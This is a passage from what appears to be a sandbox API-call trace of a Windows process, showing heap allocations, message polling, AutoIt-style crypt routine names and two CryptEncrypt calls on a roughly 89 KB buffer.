(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.903] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.903] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.904] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.904] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.905] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0033.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.906] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.906] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0033.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.908] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da248, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da248*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.908] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.908] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.908] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0033.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.908] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.908] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.908] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.908] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.909] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.909] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.909] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.909] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.909] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.909] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.909] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.909] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.909] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.909] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.910] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.910] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x15bf2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x15c00) returned 1 [0033.910] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.910] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.910] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.910] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.910] CharLowerBuffW (in: lpsz="byte[89089]", cchLength=0xb | out: lpsz="byte[89089]") returned 0xb [0033.910] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.912] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.912] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.912] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a5bb0*, pdwDataLen=0x6ae220*=0x15bf2, dwBufLen=0x15c00 | out: pbData=0x8a5bb0*, pdwDataLen=0x6ae220*=0x15c00) returned 1 [0033.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.913] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.913] 